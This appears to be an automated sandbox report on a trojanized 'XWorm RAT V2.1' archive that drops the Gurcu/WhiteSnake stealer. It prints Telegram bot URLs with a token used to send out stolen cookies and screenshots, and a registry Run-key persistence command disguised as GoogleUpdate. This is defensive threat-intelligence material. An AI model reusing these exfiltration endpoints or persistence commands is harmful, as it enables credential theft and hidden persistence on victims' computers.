Analysis
-
max time kernel
68s -
max time network
71s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
01-01-2025 23:44
General
-
Target
XWorm RAT V2.1.rar
-
Size
32.3MB
-
MD5
462d28c33afdd9482d7d10c08febf615
-
SHA1
04c8a9698de4abea97af69506f5fbdc093539b1a
-
SHA256
a7f8482b67e7000865195612c9a3028d0be97af52b4360f784054d5444b0b943
-
SHA512
f047c53c206dae5de7e09d2b3a1dfb169f1bcb2e5a075dbff82c5b8d21c5363cad4cd81b4a3bab61e551c21f6b4e930237639c0b1aaa44da608f93975dbec099
-
SSDEEP
786432:+LLnQRIjMRfdFZkRNlCVdICz0NMb7X+OwTPntsHx9RiPHQL+Wly:AkhXFZM2VOKDCkxSOA
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Detect Xworm Payload 1 IoCs
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 12 IoCs
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies registry class 36 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 29 IoCs
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\XWorm RAT V2.1.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Desktop\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\XWorm RAT V2.1\Command Reciever.exe"C:\Users\Admin\Desktop\XWorm RAT V2.1\Command Reciever.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0vtt2gae\0vtt2gae.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA999.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc77C15A278C124AB4A4854785C6D13E32.TMP"4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp5D00.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp5D00.tmp.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4776"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\find.exefind ":"4⤵
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\XWorm RAT V2.1\Fixer.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lodctr.exelodctr /r2⤵
- Drops file in System32 directory
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD5002b18f258ce736dbdc07bbce7bba2e4
SHA18b62a2b3cf34cd3bee3d1f07e6999f793951f075
SHA2567ff8c49ae0864587655140e34fb3ed10ef077d6764f4dcc8a1e51bb154a34173
SHA512f168d14a6eeeb17931ddac12840ccafd6f68d8db95efdd8ffe646f8bce6971c761192bc542cd744581849ff2219191b55b19b78b0e716a098a0473484138df3d
-
Filesize
282B
MD5db0afae73f72b1850c8fe30bf6f6d0c6
SHA1329a77d1b8f32dcd106d1018e16edbe648390dcc
SHA2568df183a75bf2744176f6a176bc5bac6e66a3987863088b0b2125c024056411d6
SHA512acb21c3020567493eec8007c822a35c237641f81cc7bcf27d1950a6a4fe024798ec55c88d3ca5b781396abcdea5a3830e66c99cf67b6c5712e953da2331cc8a4
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
1KB
MD5854836f9bf743cf14975293b38efbc91
SHA1f520f1e8e07d9e2f92e474f1f4219faaac3eb1e9
SHA2567ef5cc5ec437a837b3149e91bcb303311fb41744d2591c35f9bc7d6e791f8311
SHA512d102158f311d536b62ff4a8d9190a7c762178a45b7c189de8a37247d11aa03c4172a72b3b82905c5a4d423d254811e943047bc8dea9e61ce1610699f5ea66595
-
Filesize
295B
MD5ec7f088d76a1920e7881bdd306657d35
SHA112602ecc3ffd6c7358fb905d315913315e1c40a2
SHA25623e285f1de5da69d356559fe371c82c494ecdf8651a3d10c6f0f409ee235a1eb
SHA51289733fac55f4966377fa16e58d7478359fed2ad7498f6068b6b6c26780c6801f758c2d4c99db2a363b2fa8ba564d316537049b9cdf226b8015a63cbf9a3c4d49
-
Filesize
1KB
MD5b70192bdfa82953d23893557b94122f2
SHA14fd73efd6a6b28f57df1dde6a4241526c5b0fb60
SHA2566443d3bc34cc48e858c4fdb3ab0ad9a433705f266cb70f92886e90cbf589eab4
SHA5126dcb0273ffe6675af850d0a5e1976d9e8f8e9d6306a21856b1df4d8c0fef38fb8ff28f113e8c8b923c6451e32e734c514a15f79efe6316f180874f78608928da
-
Filesize
6.5MB
MD5a21db5b6e09c3ec82f048fd7f1c4bb3a
SHA1e7ffb13176d60b79d0b3f60eaea641827f30df64
SHA25667d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5
SHA5127caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c
-
Filesize
122B
MD52dabc46ce85aaff29f22cd74ec074f86
SHA1208ae3e48d67b94cc8be7bbfd9341d373fa8a730
SHA256a11703fd47d16020fa099a95bb4e46247d32cf8821dc1826e77a971cdd3c4c55
SHA5126a50b525bc5d8eb008b1b0d704f9942f72f1413e65751e3de83d2e16ef3cf02ef171b9da3fff0d2d92a81daac7f61b379fcf7a393f46e914435f6261965a53b3
-
Filesize
1.0MB
MD5c8db63170e85b35ce51b5d1aef098708
SHA1bd8489cc9017bfe308d748b1d62db1f154990acc
SHA2566c15c5f8e3faec8adf4321fd8f9d62f3f4dd645dafd0f9f6c52b118001654d36
SHA5124392ec79c297da34b1500799bd07eebbf1ca88b5d1efe80d9cf02d4cd9562ae617854d228876451aa53c5256f9a47b530f481da4cedb4d748b319d69a14e3a7b
-
Filesize
5.6MB
MD5eb01eece5f0887b24a1bd53183d801dc
SHA149e92aee8351e3a995d8ec95bc64d7f381dcee28
SHA256a2b1012a39662b760415ee897388c862457f4f1672897db8dee67e125bf0ad5c
SHA51283374fdc381d52b64682df5b96f02cb3d487ce12d9231ede8ee9a92ecf72fa4a0d6f91a04e5f6656cccd50f142dd44bbb08e7ecc94b647e0349064dc32a76839
-
Filesize
1.9MB
MD54904329d091687c9deb08d9bd7282e77
SHA1bcf7fcebb52cad605cb4de65bdd077e600475cc7
SHA256e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd
SHA512b7ba131e9959f2f76aa3008711db9e6f2c4753a232140368be5c8388ab0e25154a31e579ef87fe01a3e4bc83402170bb9fbf242c6f01528455246b793e03fdfb
-
Filesize
2.2MB
MD5835f081566e31c989b525bccb943569c
SHA171d04e0a86ce9585e5b7a058beb0a43cf156a332
SHA256ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579
SHA5129ec58f8c586ecf78ef8d75debc5dba58544558566423a634724bb5ab192aaf64f9ccbee9a5af48124a3366b2a7d24b4db71bb5743978201b881c08bad8f6fb0c
-
Filesize
49KB
MD5bb5474bccbb94116980a42956a4ab09d
SHA15aa05e56c1297ba52c4211c0aa1a730e95697cdf
SHA256b2d0325b67d7d1691ea5b4deda1d1e411f2834af9ebeeee1298081ed8fdd670d
SHA5124edfff9fb5a1f8d0421579cf709e56ccc8f8bec34e8f6ad51a8c8019ec98810b8c3a9c8e6ab67788a62ba2ca117634763e1f1a4fa2e27f2cf33c3133211ee706
-
Filesize
51KB
MD570c7ba068b82106810720fdec5406762
SHA1744c05ee14ea69e9706a07967b4ca1597298729d
SHA256f3fccee564956fd81a1bba3477a18b04197bccf5efa057713c92a77b266c7b33
SHA51214bb6e89946abcc10f640e2d553623b319c829e31ff872be0976c3d0419bc8ac656e4774333d4040df9507f064e9f92347677f4b20c66317fffaabed5bb1c4b4
-
Filesize
47KB
MD5391168ff06e8d68c7a6f90c1ccb088be
SHA1c3f8c12481c9d3559e8df93ade8f5bfefd271627
SHA2567f2847cbf10a70dec0bfb78ca1bf2e548caa8de43deb290cc21d4d1a47bd7525
SHA51271fe34a07a2107c03fc4735ca78814adc1c55ee3362ce01d6b9983b0ac52315485135b58edecbcd67252c1e27a451138a765bdf3f746e1241834cf35106520c6
-
Filesize
46KB
MD59c127d90b405f6e4e98e60bb83285a93
SHA1358b36827fb8dbfd9f268d7278961ae3309baaa1
SHA256878a012b076c81d7b46068109d9b9e1a86aa8527d87d0baee47b59b07502c578
SHA512bd80bb82e6f2375107153b7da67ce4a3ab3d457103a8371f93e130edece21791d8a716ab9793b74c6b5ab10166ccb52aee430bc4b63403b7e4749d7db9929e73
-
Filesize
35KB
MD517fc81a0e3f9fc02821e40166f1cb09f
SHA12931659b064a216371420db215b1f48de29a1858
SHA256fe933b8ae9d8fb3283a76b42cfed31be01d02c91cd7ba742b399df613762fff2
SHA51219a93f08124962c9826cb6794b897ddc3dd3391e2b24cebd70c2a8027aa082d2b65f2d92ba438684d6e0490f1dabb714bcb17561b951807589c5ce920f2e6031
-
Filesize
320KB
MD5b9a5000ea316ac348cf77beb0e5bc379
SHA14e666af14169eb10a0a08ac2f5ed5ecf4764df46
SHA2561b25a6879c667258cdb900683004ef007c6b3a1a933d823b124d9a6acf9de608
SHA5129fd911586a0aebec11c48e9f78de3b3f6e41c98a2770f5ac10d0a3947b4b3f326a8c5028c478c8634fb84a071186606e69a7aff83b1cf972d4728e3923503118
-
Filesize
310KB
MD51ad05e460c6fbb5f7b96e059a4ab6cef
SHA11c3e4e455fa0630aaa78a1d19537d5ff787960cf
SHA2560ae16c72ca5301b0f817e69a4bac29157369ecfbadc6c13a5a37db5901238c71
SHA512c608aa10b547003b25ff63bb1999a5fff0256aadd8b005fdd26569a9828d3591129a0f21c11ec8e5d5f390b11c49f2ef8a6e36375c9e13d547415e0ec97a398f
-
Filesize
360KB
MD51402add2a611322eb6f624705c8a9a4e
SHA1d08b0b5e602d4587e534cf5e9c3d04c549a5aa47
SHA2560ac43c8e77edb2c1468420653fc5d505b26cdc4da06c4121ce4bbecae561e6cb
SHA512177d5ea7e77eee154042b5e064db67a5cac9435890a2ff65cd98da21433f4e7de743e9df22ac0ac61be89fc0be8655b46454ed4a930d13fc7c1dfebe5896781f
-
Filesize
363KB
MD5d0a8d13996333367f0e1721ca8658e00
SHA1f48f432c5a0d3c425961e6ed6291ddb0f4b5a116
SHA25668a7924621a0fbc13d0ea151617d13732a991cef944aae67d44fc030740a82e9
SHA5128a68c62b5fc983975d010ae6504a1cbfdf34d5656e3277d9a09eb92929e201e27ca7bd2030740c8240a4afd56af57c223b4fd6de193bedf84ac7238777310de4
-
Filesize
353KB
MD5a5389200f9bbc7be1276d74ccd2939b4
SHA18d6f17c7d36f686e727b6e7b3a62812297228943
SHA256494db162e2ccd95e69404a34170b6e59847f444881834f3c175c6bc70d783087
SHA512fc1d1e81362d186410b4af3d6add3c8b32fdd75ea79b7e868cc16615358264af04f47170229d32dffcbf7e1ba2b841ccd2d4f27b0f8d82a0685806c22d3d0a92
-
Filesize
158KB
MD541f2dbe6f02b3bb9802d60f10b4ef7a2
SHA1f1b03d28e5be3db3341f3a399d1cc887fe8da794
SHA256eca01d5405d7e8af92ea60f888f891415ea2e1e6484caff15cbaf5a645700db2
SHA5121c7b85e12050d670d48121e7670e1dab787e0a0b134e0ab314dc571c3969d0f9652ff76666bb433aac5886ca532404963a3041a1d4b4352e3051c838965fd3b1
-
Filesize
5.6MB
-
Filesize
2.3MB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
72KB
-
Filesize
3.2MB
-
Filesize
152KB
-
Filesize
232KB
-
Filesize
320KB
-
Filesize
712KB
-
Filesize
424KB
-
Filesize
408KB
-
Filesize
344KB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
624KB
-
Filesize
6.6MB
-
Filesize
40KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
5.6MB